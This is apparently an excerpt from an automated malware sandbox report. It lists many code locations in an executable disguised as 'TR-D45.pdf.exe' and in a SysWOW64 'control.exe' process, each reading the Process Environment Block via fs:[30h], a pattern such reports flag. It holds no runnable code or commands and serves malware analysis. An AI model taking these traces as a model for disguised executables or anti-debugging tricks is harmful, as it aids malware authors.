      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E318DF1 mov eax, dword ptr fs:[00000030h]1_2_1E318DF1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27D5E0 mov eax, dword ptr fs:[00000030h]1_2_1E27D5E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27D5E0 mov eax, dword ptr fs:[00000030h]1_2_1E27D5E0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E32FDE2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E32FDE2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E32FDE2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32FDE2 mov eax, dword ptr fs:[00000030h]1_2_1E32FDE2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6DC9 mov ecx, dword ptr fs:[00000030h]1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E6DC9 mov eax, dword ptr fs:[00000030h]1_2_1E2E6DC9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A4A2C mov eax, dword ptr fs:[00000030h]1_2_1E2A4A2C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A4A2C mov eax, dword ptr fs:[00000030h]1_2_1E2A4A2C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32AA16 mov eax, dword ptr fs:[00000030h]1_2_1E32AA16
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32AA16 mov eax, dword ptr fs:[00000030h]1_2_1E32AA16
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E278A0A mov eax, dword ptr fs:[00000030h]1_2_1E278A0A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26AA16 mov eax, dword ptr fs:[00000030h]1_2_1E26AA16
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26AA16 mov eax, dword ptr fs:[00000030h]1_2_1E26AA16
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E283A1C mov eax, dword ptr fs:[00000030h]1_2_1E283A1C
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E265210 mov eax, dword ptr fs:[00000030h]1_2_1E265210
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E265210 mov ecx, dword ptr fs:[00000030h]1_2_1E265210
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E265210 mov eax, dword ptr fs:[00000030h]1_2_1E265210
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E265210 mov eax, dword ptr fs:[00000030h]1_2_1E265210
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A927A mov eax, dword ptr fs:[00000030h]1_2_1E2A927A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E31B260 mov eax, dword ptr fs:[00000030h]1_2_1E31B260
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E31B260 mov eax, dword ptr fs:[00000030h]1_2_1E31B260
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E338A62 mov eax, dword ptr fs:[00000030h]1_2_1E338A62
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269240 mov eax, dword ptr fs:[00000030h]1_2_1E269240
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269240 mov eax, dword ptr fs:[00000030h]1_2_1E269240
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269240 mov eax, dword ptr fs:[00000030h]1_2_1E269240
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269240 mov eax, dword ptr fs:[00000030h]1_2_1E269240
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32EA55 mov eax, dword ptr fs:[00000030h]1_2_1E32EA55
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2F4257 mov eax, dword ptr fs:[00000030h]1_2_1E2F4257
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2652A5 mov eax, dword ptr fs:[00000030h]1_2_1E2652A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2652A5 mov eax, dword ptr fs:[00000030h]1_2_1E2652A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2652A5 mov eax, dword ptr fs:[00000030h]1_2_1E2652A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2652A5 mov eax, dword ptr fs:[00000030h]1_2_1E2652A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2652A5 mov eax, dword ptr fs:[00000030h]1_2_1E2652A5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27AAB0 mov eax, dword ptr fs:[00000030h]1_2_1E27AAB0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27AAB0 mov eax, dword ptr fs:[00000030h]1_2_1E27AAB0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29FAB0 mov eax, dword ptr fs:[00000030h]1_2_1E29FAB0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29D294 mov eax, dword ptr fs:[00000030h]1_2_1E29D294
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29D294 mov eax, dword ptr fs:[00000030h]1_2_1E29D294
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E292AE4 mov eax, dword ptr fs:[00000030h]1_2_1E292AE4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E292ACB mov eax, dword ptr fs:[00000030h]1_2_1E292ACB
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32131B mov eax, dword ptr fs:[00000030h]1_2_1E32131B
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26DB60 mov ecx, dword ptr fs:[00000030h]1_2_1E26DB60
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E293B7A mov eax, dword ptr fs:[00000030h]1_2_1E293B7A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E293B7A mov eax, dword ptr fs:[00000030h]1_2_1E293B7A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26DB40 mov eax, dword ptr fs:[00000030h]1_2_1E26DB40
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E338B58 mov eax, dword ptr fs:[00000030h]1_2_1E338B58
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26F358 mov eax, dword ptr fs:[00000030h]1_2_1E26F358
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E294BAD mov eax, dword ptr fs:[00000030h]1_2_1E294BAD
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E294BAD mov eax, dword ptr fs:[00000030h]1_2_1E294BAD
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E294BAD mov eax, dword ptr fs:[00000030h]1_2_1E294BAD
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E335BA5 mov eax, dword ptr fs:[00000030h]1_2_1E335BA5
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E271B8F mov eax, dword ptr fs:[00000030h]1_2_1E271B8F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E271B8F mov eax, dword ptr fs:[00000030h]1_2_1E271B8F
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E31D380 mov ecx, dword ptr fs:[00000030h]1_2_1E31D380
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E32138A mov eax, dword ptr fs:[00000030h]1_2_1E32138A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29B390 mov eax, dword ptr fs:[00000030h]1_2_1E29B390
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E292397 mov eax, dword ptr fs:[00000030h]1_2_1E292397
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28DBE9 mov eax, dword ptr fs:[00000030h]1_2_1E28DBE9
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h]1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h]1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h]1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h]1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h]1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2903E2 mov eax, dword ptr fs:[00000030h]1_2_1E2903E2
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E53CA mov eax, dword ptr fs:[00000030h]1_2_1E2E53CA
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E53CA mov eax, dword ptr fs:[00000030h]1_2_1E2E53CA
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29002D mov eax, dword ptr fs:[00000030h]1_2_1E29002D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29002D mov eax, dword ptr fs:[00000030h]1_2_1E29002D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29002D mov eax, dword ptr fs:[00000030h]1_2_1E29002D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29002D mov eax, dword ptr fs:[00000030h]1_2_1E29002D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29002D mov eax, dword ptr fs:[00000030h]1_2_1E29002D
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27B02A mov eax, dword ptr fs:[00000030h]1_2_1E27B02A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27B02A mov eax, dword ptr fs:[00000030h]1_2_1E27B02A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27B02A mov eax, dword ptr fs:[00000030h]1_2_1E27B02A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E27B02A mov eax, dword ptr fs:[00000030h]1_2_1E27B02A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E334015 mov eax, dword ptr fs:[00000030h]1_2_1E334015
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E334015 mov eax, dword ptr fs:[00000030h]1_2_1E334015
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E7016 mov eax, dword ptr fs:[00000030h]1_2_1E2E7016
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E7016 mov eax, dword ptr fs:[00000030h]1_2_1E2E7016
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E7016 mov eax, dword ptr fs:[00000030h]1_2_1E2E7016
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E322073 mov eax, dword ptr fs:[00000030h]1_2_1E322073
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E331074 mov eax, dword ptr fs:[00000030h]1_2_1E331074
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E280050 mov eax, dword ptr fs:[00000030h]1_2_1E280050
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E280050 mov eax, dword ptr fs:[00000030h]1_2_1E280050
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2A90AF mov eax, dword ptr fs:[00000030h]1_2_1E2A90AF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h]1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h]1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h]1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h]1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h]1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2920A0 mov eax, dword ptr fs:[00000030h]1_2_1E2920A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29F0BF mov ecx, dword ptr fs:[00000030h]1_2_1E29F0BF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29F0BF mov eax, dword ptr fs:[00000030h]1_2_1E29F0BF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29F0BF mov eax, dword ptr fs:[00000030h]1_2_1E29F0BF
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269080 mov eax, dword ptr fs:[00000030h]1_2_1E269080
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E3884 mov eax, dword ptr fs:[00000030h]1_2_1E2E3884
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E3884 mov eax, dword ptr fs:[00000030h]1_2_1E2E3884
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2640E1 mov eax, dword ptr fs:[00000030h]1_2_1E2640E1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2640E1 mov eax, dword ptr fs:[00000030h]1_2_1E2640E1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2640E1 mov eax, dword ptr fs:[00000030h]1_2_1E2640E1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2658EC mov eax, dword ptr fs:[00000030h]1_2_1E2658EC
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FB8D0 mov ecx, dword ptr fs:[00000030h]1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2FB8D0 mov eax, dword ptr fs:[00000030h]1_2_1E2FB8D0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E284120 mov eax, dword ptr fs:[00000030h]1_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E284120 mov eax, dword ptr fs:[00000030h]1_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E284120 mov eax, dword ptr fs:[00000030h]1_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E284120 mov eax, dword ptr fs:[00000030h]1_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E284120 mov ecx, dword ptr fs:[00000030h]1_2_1E284120
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29513A mov eax, dword ptr fs:[00000030h]1_2_1E29513A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29513A mov eax, dword ptr fs:[00000030h]1_2_1E29513A
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269100 mov eax, dword ptr fs:[00000030h]1_2_1E269100
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269100 mov eax, dword ptr fs:[00000030h]1_2_1E269100
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E269100 mov eax, dword ptr fs:[00000030h]1_2_1E269100
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26C962 mov eax, dword ptr fs:[00000030h]1_2_1E26C962
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26B171 mov eax, dword ptr fs:[00000030h]1_2_1E26B171
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26B171 mov eax, dword ptr fs:[00000030h]1_2_1E26B171
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28B944 mov eax, dword ptr fs:[00000030h]1_2_1E28B944
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28B944 mov eax, dword ptr fs:[00000030h]1_2_1E28B944
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E69A6 mov eax, dword ptr fs:[00000030h]1_2_1E2E69A6
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2961A0 mov eax, dword ptr fs:[00000030h]1_2_1E2961A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2961A0 mov eax, dword ptr fs:[00000030h]1_2_1E2961A0
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E51BE mov eax, dword ptr fs:[00000030h]1_2_1E2E51BE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E51BE mov eax, dword ptr fs:[00000030h]1_2_1E2E51BE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E51BE mov eax, dword ptr fs:[00000030h]1_2_1E2E51BE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2E51BE mov eax, dword ptr fs:[00000030h]1_2_1E2E51BE
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3249A4 mov eax, dword ptr fs:[00000030h]1_2_1E3249A4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3249A4 mov eax, dword ptr fs:[00000030h]1_2_1E3249A4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3249A4 mov eax, dword ptr fs:[00000030h]1_2_1E3249A4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E3249A4 mov eax, dword ptr fs:[00000030h]1_2_1E3249A4
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E28C182 mov eax, dword ptr fs:[00000030h]1_2_1E28C182
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E29A185 mov eax, dword ptr fs:[00000030h]1_2_1E29A185
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E292990 mov eax, dword ptr fs:[00000030h]1_2_1E292990
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E2F41E8 mov eax, dword ptr fs:[00000030h]1_2_1E2F41E8
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26B1E1 mov eax, dword ptr fs:[00000030h]1_2_1E26B1E1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26B1E1 mov eax, dword ptr fs:[00000030h]1_2_1E26B1E1
      Source: C:\Users\user\Desktop\TR-D45.pdf.exeCode function: 1_2_1E26B1E1 mov eax, dword ptr fs:[00000030h]1_2_1E26B1E1
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446A44B mov eax, dword ptr fs:[00000030h]12_2_0446A44B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04450050 mov eax, dword ptr fs:[00000030h]12_2_04450050
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04450050 mov eax, dword ptr fs:[00000030h]12_2_04450050
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CC450 mov eax, dword ptr fs:[00000030h]12_2_044CC450
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CC450 mov eax, dword ptr fs:[00000030h]12_2_044CC450
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04501074 mov eax, dword ptr fs:[00000030h]12_2_04501074
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0445746D mov eax, dword ptr fs:[00000030h]12_2_0445746D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F2073 mov eax, dword ptr fs:[00000030h]12_2_044F2073
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6C0A mov eax, dword ptr fs:[00000030h]12_2_044B6C0A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6C0A mov eax, dword ptr fs:[00000030h]12_2_044B6C0A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6C0A mov eax, dword ptr fs:[00000030h]12_2_044B6C0A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6C0A mov eax, dword ptr fs:[00000030h]12_2_044B6C0A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04504015 mov eax, dword ptr fs:[00000030h]12_2_04504015
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04504015 mov eax, dword ptr fs:[00000030h]12_2_04504015
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F1C06 mov eax, dword ptr fs:[00000030h]12_2_044F1C06
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B7016 mov eax, dword ptr fs:[00000030h]12_2_044B7016
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B7016 mov eax, dword ptr fs:[00000030h]12_2_044B7016
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B7016 mov eax, dword ptr fs:[00000030h]12_2_044B7016
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0450740D mov eax, dword ptr fs:[00000030h]12_2_0450740D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0450740D mov eax, dword ptr fs:[00000030h]12_2_0450740D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0450740D mov eax, dword ptr fs:[00000030h]12_2_0450740D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446BC2C mov eax, dword ptr fs:[00000030h]12_2_0446BC2C
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446002D mov eax, dword ptr fs:[00000030h]12_2_0446002D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446002D mov eax, dword ptr fs:[00000030h]12_2_0446002D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446002D mov eax, dword ptr fs:[00000030h]12_2_0446002D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446002D mov eax, dword ptr fs:[00000030h]12_2_0446002D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0446002D mov eax, dword ptr fs:[00000030h]12_2_0446002D
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B02A mov eax, dword ptr fs:[00000030h]12_2_0444B02A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B02A mov eax, dword ptr fs:[00000030h]12_2_0444B02A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B02A mov eax, dword ptr fs:[00000030h]12_2_0444B02A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444B02A mov eax, dword ptr fs:[00000030h]12_2_0444B02A
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04508CD6 mov eax, dword ptr fs:[00000030h]12_2_04508CD6
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov eax, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov ecx, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov eax, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov eax, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov eax, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044CB8D0 mov eax, dword ptr fs:[00000030h]12_2_044CB8D0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044358EC mov eax, dword ptr fs:[00000030h]12_2_044358EC
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044F14FB mov eax, dword ptr fs:[00000030h]12_2_044F14FB
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6CF0 mov eax, dword ptr fs:[00000030h]12_2_044B6CF0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6CF0 mov eax, dword ptr fs:[00000030h]12_2_044B6CF0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B6CF0 mov eax, dword ptr fs:[00000030h]12_2_044B6CF0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_04439080 mov eax, dword ptr fs:[00000030h]12_2_04439080
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B3884 mov eax, dword ptr fs:[00000030h]12_2_044B3884
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044B3884 mov eax, dword ptr fs:[00000030h]12_2_044B3884
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_0444849B mov eax, dword ptr fs:[00000030h]12_2_0444849B
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
      Source: C:\Windows\SysWOW64\control.exeCode function: 12_2_044620A0 mov eax, dword ptr fs:[00000030h]12_2_044620A0
